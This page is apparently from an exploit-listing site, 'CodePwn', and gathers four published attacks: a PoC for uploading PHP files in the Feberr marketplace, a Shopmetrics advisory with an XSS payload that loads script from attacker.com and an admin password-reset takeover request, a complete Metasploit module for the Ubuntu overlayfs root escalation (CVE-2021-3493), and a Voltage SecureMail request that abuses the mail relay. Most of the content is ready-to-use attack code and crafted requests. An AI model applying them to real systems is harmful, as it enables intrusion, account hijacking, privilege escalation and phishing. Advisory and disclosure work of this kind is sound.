Latest exploits :: CodePwn

<pre><code># Exploit Title: Feberr - Multivendor Digital Products Marketplace arbitrary file upload # Version 12.7 # Google Dork: N/A # Date: 24/01/2022 # Exploit Author: Sohel Yousef - sohel.yousef@yandex.com # Software Link: https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace # Software link 2 :https://www.codecanor.com/product/feberr-multivendor-digital-products-marketplace/ # Software Demo : https://overtasks.com/demo/feberr # Category: webapps Feberr - Multivendor Digital Products Marketplace contain arbitrary file upload registered vendor can upload .php files in edit-item section using tinymce with use of intercept tool in burbsuite to edit the raw details after register as vendor on the system go and edit or add an item in the section of detailes there tinymce direct link : https://localhost/feberr/edit-item/ POST /demo/feberr/upload HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: ar,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------429310566417994448462725662126 Content-Length: 179156 Origin: https://overtasks.com Connection: close Referer: https://localhost /demo/feberr/edit-item/PFRLZAmzwdWFNWnlgxUaxbLIO Cookie: XSRF-TOKEN=eyJpdiI6InNxSGJaQjZ0UDYzamhnT2lXL09FWmc9PSIsInZhbHVlIjoiOEZCSVBnL3orczdpc2p4RE40ZmhlWCtKck1UNURET2EwWTdyeEtDVUR0Q1pMa2RLSXphSjNTbWJnRVlNS3Jld1U2d1lucWRNMDg1RVUybWdXTlMzMDAzUHcrdjNiM0IyWXRDbk01dzJJZU0zK3ZOWFlVM2JkTFRTZzdMMGhmN1UiLCJtYWMiOiIzYzU2ZTFkNThjZGQ5ZTI0ZWNiNzUzNWEyM2E4ZTk0OTZlZWYzMDc2NDAxOWU5NjZhNjkzNzQ5ZTIzMTA2NGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNKa1RRUHgvVStWYy85MkNuVFI2RlE9PSIsInZhbHVlIjoiUk8vMWMrS0NNLzczUWdSdFBnck1sSmdzVUhkckdQYUtORlczSGFDNWRJN1MvbGx0VGFNUkVCTS9jb1I3L25PbkdBc29hODltMXVTTVlxQVlIQ1FSaWtmVWwzWkNYVUlOQUk2Q04zbmwxdzRSQXdiRTF4WVhTTy9IaWp0V2dwM0UiLCJtYWMiOiIzMDY1ODI4ODkwZTczNjJkNjZhYmE3YjJiZWFiNzA0ODNhNTdmY2RkYjFhMmFlODQ3MTg1OTAyMDFiNWM1NjMwIiwidGFnIjoiIn0%3D Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------429310566417994448462725662126 Content-Disposition: form-data; name="file"; filename="blobid1643057738041.jpg" >>>>>>>>>>>>>>> CHANGE THIS TO .php Content-Type: image/jpeg you will have the direct link to your uploaded file using tinymce editor </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220202-0 > ======================================================================= title: Broken access control & Cross-Site Scripting product: Shopmetrics Mystery Shopping Software vulnerable version: SaaS platform before v21-11 fixed version: SaaS platform v21-11 CVE number: n/a for SaaS impact: Critical homepage: https://www.shopmetrics.com/ found: 2021-05-06 by: D. Zalmanov (Office Moscow) A. Vodyasov (Office Moscow) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Founded in 2004, Shopmetrics is a company that offers technology platform solutions to mystery shopping and market research providers worldwide. Today Shopmetrics is a global organization with offices in North America and Europe. With over 80 full-time, dedicated developers and product specialists we are committed to providing technology that is the industry benchmark in mystery shopping and market research." Source: https://shopmetrics.com/Company.asp Business recommendation: ------------------------ The solution is provided as software as a service. The current version as of v21-11 already contains the fix and all users should be protected. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- 1) Reflected cross site scripting A reflected cross site scripting vulnerability was identified on various input fields in the application. An attacker is able to perform actions in the context of the attacked user by exploiting this vulnerability. 2) Broken Access Control Users of the web application are required to supply a username and password combination in order to login. This identification mechanism is used in order to ensure that only those who possess the proper credentials are able to login to the application, while unauthorized users cannot. A user who has forgotten or misplaced their password is able to request that their password be reset by supplying a valid email address. Therefore, it is of the utmost importance to ensure that unauthorized users – whether accidentally or intentionally – will not be able to step outside the scope of their permission boundaries. This means, inter alia, that the tier’s logic may not be manipulated by the client-side input and that the logic is confined to parameters defined solely by the server. It was identified that due to flaws in the authorization scheme, an authorization bypass vulnerability allows an attacker to get access to the restricted password reset functionality, which allows an attacker with knowledge of a valid email address, to reset any password and hijack a user account. Proof of concept: ----------------- 1) Reflected cross site scripting The request to create a new user looks like the following: ------------------------------------------------------------------------------- POST /document.asp?alias=mystadministration.user.manage HTTP/2 [...] CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21& firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&city=xyz& state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&phonework=2132132121321& phonemobile=32132121321&fax=213321321321&email=user%40victim.com&timezone=27&defaultWelcomePage=&isdisabled=N ------------------------------------------------------------------------------- In a live attack scenario the following JavaScript code will be hosted on the attacker's server. ------------------------------------------------------------------------------- var data="CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21& firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz& city=xyz&state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321& phonework=2132132121321&phonemobile=32132121321&fax=213321321321&email=user%40victim.com& timezone=27&defaultWelcomePage=&isdisabled=N"; var url="https://shopmetricshost/document.asp?alias=mystadministration.user.manage"; var http=new XMLHttpRequest(); http.open('POST', url, true); http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); http.send(data) ------------------------------------------------------------------------------- When the logged-in victim clicks on the following link, the script will be executed in the context of the browser and the new user will be created. ------------------------------------------------------------------------------- https://shopmetricshost/open/data.asp?post={%22action%22:%22exec%22,%22dataset%22: {%22datasetname%22:%22/System/Platform/Globalization/LiteralsGetTranslations%22,%22dataformat%22:%22simple%22,%22datafieldproperties%22:{%22columns%22:[%22name%22]}}, %22parameters%22:[{%22name%22:%22LiteralIDs%22, %22value%22:%22XXX%3C%3E%3Chtml%3E%3Cscript+src%3dhttps%3a//attacker.com%3a4443/payload.js%3E%3C/script%3E%3C/html%3EYYY%22}]} ------------------------------------------------------------------------------- 2) Broken Access Control There is a password reset functionality in the application. The following request is sent when the user tries to reset the password. ------------------------------------------------------------------------------- POST /open/data.asp HTTP/2 [...] post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2", "dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}}, "parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"}, {"name"%3a"EntityName","value"%3a"ChangePassword"},{"name"%3a"EntityInstanceID","value"%3anull}, {"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a¬- ¬P¬¬34| BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬user%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬- F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬newpass¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬¬newpass¬U¬5983¬- z¬B¬0-1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]} ------------------------------------------------------------------------------- There is no integrity check of the parameters of this request. Therefore, an attacker can supply any email to this request and the password of the account, which is connected to the supplied e-mail, will be changed to the password value controlled by an attacker. For example, the request to change the password of the admin user with e-mail admin@victim.com (Administrator user). ------------------------------------------------------------------------------- POST /open/data.asp HTTP/2 [...] post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2", "dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},{"name"%3a"EntityName","value"%3a"ChangePassword"}, {"name"%3a"EntityInstanceID","value"%3anull},{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a15¬¬0¬- ¬ab¬-Mozilla/5.0+(Windows+NT+10.0%3b+Win64%3b+x64%3b+rv%3a88.0)+Gecko/20100101+Firefox/88.0¬¬1¬- ¬P¬¬34| BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬admin%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬- F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬AttackerPassword¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬-AttackerPassword¬U¬5983¬- z¬B¬0¬1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull}, {"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]} ------------------------------------------------------------------------------- After this request an attacker can successfully login as admin user with the password "AttackerPassword". Vulnerable / tested versions: ----------------------------- No version number is available as the solution is provided as software as a service (SaaS). The product was affected by the vulnerability during the timeframe of the test and until it was fixed later in 2021. Vendor contact timeline: ------------------------ The vendor was contacted through a third party. The vendor confirmed on 7th December 2021 that the advisory could be published. Solution: --------- The solution is provided as software as a service. The current version as of v21-11 contains the fix and all users should be protected. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF D. Zalmanov, A. Vodyasov / @2022 </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Compile include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => '2021 Ubuntu Overlayfs LPE', 'Description' => %q{ This module exploits a vulnerability in Ubuntu's implementation of overlayfs. The vulnerability is the result of failing to verify the ability of a user to set the attributes in a running executable. Specifically, when Overlayfs sends the set attributes data to the underlying file system via `vfs_setxattr`, it fails to first verify the data by calling `cap_convert_nscap`. This vulnerability was patched by moving the call to `cap_convert_nscap` into the `vfs_setxattr` function that sets the attribute, forcing verification every time the `vfs_setxattr` is called rather than trusting the data was already verified. }, 'License' => MSF_LICENSE, 'Author' => [ 'ssd-disclosure', 'bwatters-r7' # Aka @tychos_moose, Metasploit Module ], 'DisclosureDate' => '2021-04-12', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Privileged' => true, 'References' => [ [ 'CVE', '2021-3493' ], [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/' ], [ 'URL', 'https://github.com/briskets/CVE-2021-3493' ] ], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ ], 'SideEffects' => [ ARTIFACTS_ON_DISK ] }, 'Targets' => [ [ 'x86_64', { 'Arch' => [ ARCH_X64 ] } ], [ 'aarch64', { 'Arch' => [ ARCH_AARCH64 ] } ] ], 'DefaultTarget' => 0 ) ) register_options [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) ] register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def check arch = kernel_hardware unless arch.include?('x86_64') || arch.include?('aarch64') return CheckCode::Safe("System architecture #{arch} is not supported") end release = kernel_release version = kernel_version unless userns_enabled? return CheckCode::Safe('Unprivileged user namespaces are not permitted') end vprint_good('Unprivileged user namespaces are permitted') # If the target is Ubuntu... unless version =~ /[uU]buntu/ return CheckCode::Safe('Target is not Ubuntu!') end version_array = release.split('-') if version_array.length < 2 fail_with(Failure::UnexpectedReply, 'The target Ubuntu server does not have the expected kernel version format!') end vprint_status("Version array: #{version_array}") major_version = Rex::Version.new(version_array[0]) vprint_status("major_version: #{major_version}") minor_version = version_array[1] vprint_status("minor_version: #{minor_version}") lower_bound_version = Rex::Version.new(3.13) upper_bound_version = Rex::Version.new(5.14) if major_version > upper_bound_version || major_version < lower_bound_version return CheckCode::Safe("The target version #{major_version} is outside the vulnerable version range #{lower_bound_version}-#{upper_bound_version}") end return CheckCode::Appears end def exploit if is_root? && !datastore['ForceExploit'] fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.') end base_dir = datastore['WritableDir'].to_s unless writable?(base_dir) fail_with(Failure::BadConfig, "#{base_dir} is not writable") end executable_name = ".#{rand_text_alphanumeric(5..10)}" exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" exploit_path = "#{exploit_dir}/#{executable_name}" if file_exist?(exploit_dir) fail_with(Failure::BadConfig, 'Exploit dir already exists') end mkdir(exploit_dir) register_dir_for_cleanup(exploit_dir) # Upload exploit arch = kernel_hardware vprint_status("Detected architecture: #{arch}") if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch')) fail_with(Failure::BadConfig, 'Host/payload Mismatch; set target and select matching payload') end if live_compile? vprint_status('Live compiling exploit on system...') upload_and_compile(exploit_path, exploit_source('CVE-2021-3493', 'cve_2021_3493.c')) else vprint_status 'Dropping pre-compiled exploit on system...' if arch.include?('x86_64') precompiled_binary = 'cve_2021_3493.x64.elf' vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...") upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary) elsif arch.include?('aarch64') precompiled_binary = 'cve_2021_3493.aarch64.elf' vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...") upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary) else fail_with(Failure::NoTarget, "Unknown architecture: '#{arch}'") end end register_file_for_cleanup(exploit_path) # Upload payload payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}" upload_and_chmodx(payload_path, generate_payload_exe) # Launch exploit print_status('Launching exploit...') random_string = rand_text_alphanumeric(5..10) cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir} #{random_string}" vprint_status("Running: #{cmd_string}") begin output = cmd_exec(cmd_string) vprint_status(output) rescue Error => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error("Exploit failed: #{e}") ensure # rmdir() fails here on mettle payloads, so I'm just shelling out the rm for the exploit directory. cmd_exec("rm -rf '#{exploit_dir}'") end end end </code></pre>

<pre><code>Security Advisory ======================================================================= title: Business Logic Bypass - Mail Relay (Post-authenticated) product: Voltage SecureMail Server vulnerable version: Voltage SecureMail Server <v7.3.0.1 fixed version: Voltage SecureMail Server v7.3.0.1 CVE number: CVE-2021-38130 impact: Medium homepage: https://www.microfocus.com/en-us/cyberres/data-privacy-protection/secure-mail found: 2021-06-25 by: TING Meng Yean (GIS Red Team) United Overseas Bank Limited (UOB) ======================================================================= Vendor description: ------------------- Voltage SecureMail simplifies compliance to privacy regulations, including MA, PCI, HITECH, UK FSA, and EU Data privacy directives, and mitigates the risk of email security breaches. Voltage SecureMail provides end-to-end security for email and attachments, inside the enterprise to the desktop, at the enterprise gateway, and across leading mobile smartphones and tablets. The solution provides the confidence and peace of mind that sensitive data is protected in transit and in storage, wherever it is in an email system to any inbox (e.g., Outlook, Lotus Notes, Gmail, and Yahoo!), without disrupting existing email services or business processes. Source: http://www.securemailworks.com/SecureMail.asp Business recommendation: ------------------------ The vendor provides a patch and users of this product are urged to upgrade to the latest version available. Reference: https://portal.microfocus.com/s/article/KM000003667 An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- Business Logic Bypass - Mail Relay (Post-authenticated) - CVE CVE-2021-38130 - CWE-284: Improper Access Control - CVSSv3: 5.4 (Medium) https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N Voltage SecureMail is an email protection service that provides email encryption. With each secure email, there is an HTML attachment named "message_zdm.html" that furnishes access to the Zero Download Messenger (ZDM), which can be a web portal or mobile app. The encrypted body of the original message as well as any attachments to the original email is contained within this attachment. The email recipient needs to install Voltage SecureMail app (for mobile) or browse to the Voltage SecureMail Server portal (desktop) to authenticate and view any secure email and attachments sent via ZDM. When the recipient opens the "message_zdm.html" file for the first time on a desktop, the browser is brought to the corporation's SecureMail portal where the user has to create a password in order to continue. An email verification email is sent to the recipient with a One Time Link, and the recipient can read the email on the SecureMail portal after clicking on the link. If the recipient opens the "message_zdm.html" file again in the future, the recipient has to input the previously created password. When viewing the email on the SecureMail portal, the recipient can choose to reply to the email by clicking "Reply" or "Reply to All". The SecureMail portal only allows the recipient to reply to the original email sender and to the email addresses in the Cc/Bcc list. However, it is possible to modify the original email addresses in the "to", "cc" or "bcc" fields, or to add arbitrary email addresses, by sending a special POST request. As the SecureMail portal displays the logo and valid SSL certificate of the corporation in use, an attacker who have received a SecureMail encrypted email previously can make use of the SecureMail portal to send phishing emails to third parties. Note that the attacker is unable to spoof the "from" address, so the emails to third parties will be from the attacker's email address. Proof of concept: ----------------- When the recipient replies to the email by clicking "Reply" or "Reply to All", the recipient is brought to the "Compose New Message" page. To send the email reply, the recipient then clicks on the "Send Secure" button. The SecureMail portal does not allow the modification of the "to", "cc" or "bcc" field if the user attempts to intercept the POST request after clicking on the "Send Secure" button. However, if the user attempts to intercept the POST request after clicking on the "Plain Text" button, the modification of the "to", "cc" or "bcc" field is successful. The modified email is then successfully sent out after the user click on the "Send Secure" button. It is noted that there is one difference in the POST request parameters between a "Send Secure" and "Plain Text" that allows the "to", "cc" and "bcc" fields to be modified, and the difference is the "send" versus "x" parameters. The rest pf the contents of the "Send Secure" and "Plain Text" POST requests are almost identical. Original "Send Secure" Request ######################################################################## POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1 Host: <...snipped...> Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...> Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372 Te: trailers -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="CSRFToken" <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="c" c3 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="h" h924481124 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="send" send -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="senderKeyEnc" <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="to" original.sender@corp.com -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="showCcEnabled" on -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="cc" -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="bcc" -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="subject" RE: <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="attachment"; filename="" Content-Type: application/octet-stream -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="editModeToggle" 0 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="body" <...snipped...> -----------------------------289584800395870328816642372 ######################################################################## Modified "Plain Text" request ######################################################################## POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1 Host: <...snipped...> Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...> Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372 Te: trailers -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="CSRFToken" <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="c" c3 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="h" h924481124 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="x" x -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="senderKeyEnc" <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="to" victim1@external.com -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="showCcEnabled" on -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="cc" victim2@external.com -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="bcc" victim3@external.com -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="subject" RE: <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="attachment"; filename="" Content-Type: application/octet-stream -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="editModeToggle" 1 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="body" <...snipped...> -----------------------------289584800395870328816642372-- ######################################################################## As of the patched Voltage SecureMail Server version 7.3.0-259490, the vulnerability for the "Plain Text" was no longer replicable. However, the same vulnerability can be replicated using the "Attach" function. Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: * 7.3 * 7.3.0-259490 Vendor contact timeline (GMT+8): -------------------------------- 2021-06-25: Contacting vendor through their SecureMail product support team. 2021-06-28: Contacting Micro Focus Product Security Response Team (PSRT) security@microfocus.com to request for CVE number. 2021-06-29: Micro Focus PSRT opened PSRT case 80358. 2021-07-02: SecureMail product support team confirmed the vulnerability and working on patch. 2021-07-31: SecureMail product support team released test patch v7.3.0-259490. 2021-08-04: Confirmed vulnerability "Plain Text" function was no longer replicable, but the same vulnerability can be replicated using the "Attach" function. Notified the SecureMail product support team. 2021-11-11: SecureMail product support team released patch v7.3.0.1. 2022-01-21: Requested Micro Focus PSRT for updates. 2022-01-24: Micro Focus PSRT responded with assigned CVE number. 2022-01-29: Micro Focus PSRT published security bulletin. 2022-02-03: Coordinated release of security advisory. Solution: --------- According to the vendor, Voltage SecureMail resolved this vulnerability in the version 7.3.0.1 patch release and customers should contact their support representative for information about downloading and applying the patch. Security Bulletin URL: ---------------------- https://portal.microfocus.com/s/article/KM000003667 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Meng Yean TING (GIS Red Team) United Overseas Bank Limited (UOB) -----BEGIN PGP PUBLIC KEY BLOCK----- mQINBF5OZxUBEADpXPnK42+IIN4t2oP23y/9jaOsLT8jkfvAIjT1pnbhbI/wSTla e+Lm6f64YPrFuvZgcAMLTv4gIXrhnwHYn6J5d56e9cnsZ4fuIw1fIAqivjGxJqDL FtvIptzpfn9CbXsQViR6AJY6CffOs9Lm/UN/LbZCBLPmJTOXkGqw/vfkBRZwwcbH 352tS85UXc0C+EAXhfQj34AkfIHR+O02JU+pP/obdKoxXC3GcHRBOqI9JaV1Qehv Xyl04rbGLssIjx9Bi3+f7dis4SfQpt157pnZetcWQRGM0/EvGtLT/zrYwueNI6qU XVoKqGWPUJEfVaA6f+iVpj0Jv4uy4t4vo5MKcVtQY7RY00T1cCNeBxRW8MqYGubT j3NiUndOu3V1FlX9kerTYJEigxVzvB9t9LuYOlqEBfhsU5x0L60o2/M9Max81yg1 93jDPDflCHhQqc2f2hHHJPYnXQceomlaD+CIHxxa5vWwTl6pPNkuSOBTw5A5FAMu HJLFJnAPuTp4hXAS6fjs827jpJd9L6xN/sXj+CLJuDvREAYI7cVhTByT3GjWfGUT 754cJU+frd08FuLHbMLjp+d2ybGT53sHj5LDJrV/YRSjmzHniEhRM8OucIbl+k/n lBtHxlMUmXBIodj7D0acW4m+pEMI7xsHKRLjuwAXi88oaRhKCn2nLMJTcwARAQAB tCtUSU5HIE1lbmcgWWVhbiA8VGluZy5NZW5nWWVhbkB1b2Jncm91cC5jb20+iQJU BBMBCAA+FiEEqd3a+A8bLZBoo4of7xtCbb3H/4cFAl5OZxUCGyMFCRLPlKsFCwkI BwIGFQoJCAsCBBYCAwECHgECF4AACgkQ7xtCbb3H/4fivhAA3oRlhncZzXcm+tVO 0atU1i7HcHjWOUtgzSV3E17C4Fi3cpkoLtuDjAcNdLWyX3ofcKUnVm6Pna9xbWJ0 h21BYwoScVZMKm7IGMsk2Ovfn6zVNVgKxJ+CkD+dePLKv1iIXHAmU+G9ddgKhDrf 4C1w/0mwd8gVay+tN5h57XlfaDoOVW846yRXX+imBrwW4oZWRL4Pt2e4cW7p9Ngu O5lIJiossLjIrHSKIdQ2AYX1ufjHjoBbp/rQJ9vNp40EPz9L46dRTlu7DYk4CwI+ 0Fd7HhZ0puMgTSPUXLHIiORzmAzyiy9BHLRJBBLQzkg9i6LQCNtD/xByILFCg0dH fuZf2rgNq3GGDfFd9PIEqHNVd4B7a8b/wgRracsIHbGG6sk3iMa/Dm4vp35A35pR q15FVtMS3cJoEs55jAowrE6FnZ/PBNjlejxOqQMlfcESdzRf18+ywAxce0R/Y0Cx L9X017vewYm+f9VqTO51Scq+fq/9QIGvi85+YLx9SZ6mqqRmoKWH5MefNQoGgM5U Jb2hSJVXqhREd3ZaRb/+UZ964Yf8F7xIoI+kQUMwOJPGjmLm1yMklfNcDMGiiM5Z Igw9F0gut10VrNrY3SJJraOa+IdX2t3tFlKwJdC1W50E5cUR6y9UMu/7Q+f+3o6T CMdqiXxJ7JuSWHRKA1iAQ3lxAsu5Ag0EXk5nFQEQAOG5Ypef8P/Omtv6HghvcLCK 8EJ5R+99O+YFS0EuuSSZ3yReB7ImWg7RKx4Xwnr3LrKzcdVvgERwWoiXFi7F2736 hqvfjwBbwJw1iBTcnKF5uEhafjDHfM/mhMt/bMrJPBX4dee9D0TahuV/cgRqORXu 0dj6z6cNrFeZS+fgAgbVlAkvvtiPgT8SCGyBDQntYBYo631fkSS9GrfOb5curH9y xRb+yugWP+bSWNWMEGfs+SQi90a28Te1NzOoca3hhgcjv1lZQkMmKtg91jPqxRHd JPul1IhYPBEE0yLrP845KwGyoM/4Zd+wSxjdmgOP/bULflXiGff2doVdoVTPo3wK zQxIQ2/3X50Dlnc4oDN2R8fvph1HP3VdweJ0r3PsPNcfRa7ckgmogHX5ISGNnSr5 qbm/V5Y11Pm9BnTCOz32cDD2sB7d9u58PD4c0IUDCYK0rMQ8r4Bhbmt3NeXO7V4O o4p7BZIuJYH8wz4Q/dPNS7EHacg9iOzbDJk95frzkwSLu8rUQCByDNJaARaaVpMM kdGzWFw7s/vbuRoyBSI4R2xAM8Ze9njFZDowXrImPJaFhlAF40JUbL5I85dVeQSd dtd2A7h2dTktgKe0+jFgGNbOwQT9z7ziY0jzd2xcIgXDL+O95nfy0aaiIWL+8AN/ IsVj3qnkQjPOLTecrndxABEBAAGJAjwEGAEIACYWIQSp3dr4DxstkGijih/vG0Jt vcf/hwUCXk5nFQIbDAUJEs+UqwAKCRDvG0Jtvcf/h9mpEADJZ/N8J8MXCmnp0oHQ VNc/M1IhNJZhOmlJdqV+PQVHe8FFJv924avh4Nh6nX+U7Qx7uX7DC82BsLhx3rui 5HWzHt/x7ORegwYBz7frvlApT1IF84wLpGBV+rJnC1kscHv5iQN9OEtOAlcvoz2l 7d0aXs+/x5ueJol9Psu1xcwOyjili21Ucu7GAwAPRzyK9IMhgKPW/w1yD8ADUIxu Uzg8Qy9bIElPMlaw5m1hHmEbDUF/2kxYPnfvF4AAaff1jSFhJHwTNzploI5nNnT6 vm/waE/rwpbDlsTZ5lKan4UJvwQuG5R8aEegNpllD3/2Yhk8/8CEkuGRM5UfNDRM bhH4WG6jy1xGzSvjQughoUt8xlXJhJD+AeCCwukWmkNK160jDZNN5aG2iUgoMXOM 